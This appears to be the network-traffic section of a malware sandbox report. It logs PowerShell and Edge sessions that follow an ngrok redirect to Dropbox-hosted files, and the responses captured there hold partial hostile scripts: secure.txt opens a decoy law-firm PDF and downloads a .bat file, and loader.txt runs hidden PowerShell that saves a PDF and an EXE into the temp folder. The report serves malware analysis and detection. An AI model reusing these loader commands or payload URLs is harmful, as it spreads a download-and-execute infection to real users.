                                                                                                                                                                                                                                                                                  • uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  • uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  • uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 18.192.31.165 | 443 | 7148 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:18 UTC | 230 | OUT | GET /api/secure/3280fc306b2b1b17d755c31452bd62f7 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: 7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app
Connection: Keep-Alive
2024-12-10 17:41:20 UTC | 321 | IN | HTTP/1.1 302 Found
Access-Control-Allow-Origin: *
Content-Length: 395
Content-Type: text/html; charset=utf-8
Date: Tue, 10 Dec 2024 17:41:20 GMT
Location: https://www.dropbox.com/scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1
Server: Werkzeug/3.0.3 Python/3.12.8
Connection: close
2024-12-10 17:41:20 UTC | 395 | IN | Data Ascii: <!doctype html><html lang=en><title>Redirecting...</title><h1>Redirecting...</h1><p>You should be redirected automatically to the target URL: <a href="https://www.dropbox.com/scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&amp;


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  1192.168.2.449732162.125.69.184437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:21 UTC236OUTGET /scl/fi/nslqaaaucex7u0dud265w/secure.txt?rlkey=3djwq7bnao7gleqen7lk4ym97&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:23 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: media-src https://* blob: ; img-src https://* data: blob: ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; frame-ancestors 'self' https://*.dropbox.com ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; font-src https://* data: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; base-uri 'self' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/cl [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com/cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=MjY3MjM5ODE3MzExNTEzMjg3MzI0NTA0MDk0NTQzMjU5ODExOTU2; Path=/; Expires=Sun, 09 Dec 2029 17:41:22 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=KDWIb7VLXz0QvlmG-ihserir; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:22 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=KDWIb7VLXz0QvlmG-ihserir; Path=/; Expires=Wed, 10 Dec 2025 17:41:22 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=MZB264KDo8; Path=/; Expires=Wed, 10 Dec 2025 17:41:22 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:22 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:22 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: f7880decc3404c3aa254d933a253fb17
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:23 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49733 | 162.125.69.15 | 443 | 7148 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:24 UTC | 370 | OUT | GET /cd/0/get/CgBYRhUVTjDsxE79MTNoCNhU07mzsblpWfuZAJ1kVr8F5NLHVp5HdRP3LQxOuASaVpkKRl1J1qypCBfX8gbAMtbFBAbF7EmFE1r-hX1wxJZ97dDKiUG-5gUD_1lmXFajsI84SRn-GgCVXa-VdShugwxm/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:25 UTC | 734 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="secure.txt"; filename*=UTF-8''secure.txt
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733749326451336d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 153
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:25 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 411
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 361449db4d9740ebae67cbceca5dd032
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:25 UTC | 411 | IN | Data Ascii: Start-Process msedge.exe -ArgumentList "--kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1"; $RandomFileName = "$env:temp\$(Get-Random).bat"; IWR -Uri "https://www.dropbox.com/scl/fi/alvf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49735 | 162.125.69.18 | 443 | 7148 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:29 UTC | 212 | OUT | GET /scl/fi/alvflaagbv3imslrlvn5w/loader.txt?rlkey=yc2jjmh5k3fj1en6bx0570rlg&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
2024-12-10 17:41:30 UTC | 4091 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: img-src https://* data: blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ http [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com/cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=OTUxMjk2NDQwMDMzODU1MDEzOTgyNjgyMDg5OTIzODM5Mzg1NDc=; Path=/; Expires=Sun, 09 Dec 2029 17:41:30 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=B2sKJui6CwSTU3j_nc2iJGiM; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:30 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=B2sKJui6CwSTU3j_nc2iJGiM; Path=/; Expires=Wed, 10 Dec 2025 17:41:30 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=oeSiYBENqU; Path=/; Expires=Wed, 10 Dec 2025 17:41:30 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:30 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:30 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 2e43ec5fe4354bb8bccd087bfd9fa918
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:30 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49736 | 162.125.65.15 | 443 | 7148 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:33 UTC | 370 | OUT | GET /cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
2024-12-10 17:41:33 UTC | 734 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733749324039058d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 109
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:33 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 626
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 40ba2139f137476780d4e0460d5dad7f
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:33 UTC | 626 | IN
                                                                                                                                                                                                                                                                                  Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49737 | 162.125.69.18 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:34 UTC | 764 | OUT | GET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:41:35 UTC | 4094 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/s [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=Mjg5Mjk5NzUwMjQ4ODg2NTE4MTI2Mjc5OTM3MjkyMjEyMDY4MjU3; Path=/; Expires=Sun, 09 Dec 2029 17:41:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=4_jNU9-otPhdRtvnXA_fxZ2k; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=4_jNU9-otPhdRtvnXA_fxZ2k; Path=/; Expires=Wed, 10 Dec 2025 17:41:34 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=GnlWfVuQN4; Path=/; Expires=Wed, 10 Dec 2025 17:41:34 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:34 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:35 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 3bfe646fe7a34a5696d60dfacaeed914
                                                                                                                                                                                                                                                                                  Connection: close
2024-12-10 17:41:35 UTC | 17 | IN | Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49749 | 162.125.69.15 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 888 | OUT | GET /cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:41:38 UTC | 668 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                  Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 152
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:37 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 106848
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 6457b8672281410ca34940bad1970b5a
                                                                                                                                                                                                                                                                                  Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 142.250.181.65 | 443 | 7952 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-10 17:41:37 UTC | 594 | OUT | GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-10 17:41:38 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Content-Length: 138356
                                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC4J6TCUHaB4vHZh0xUuNyuZTRP74OTuNvyhfX-3NnOS1BLi6LlEqdKyjB_ciY1UI5FxAAbinHU
                                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=ld9IFg==
                                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 16:45:00 GMT
                                                                                                                                                                                                                                                                                  Expires: Wed, 10 Dec 2025 16:45:00 GMT
                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                  Age: 3398
                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT
                                                                                                                                                                                                                                                                                  ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41
                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Data Ascii: Jc$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
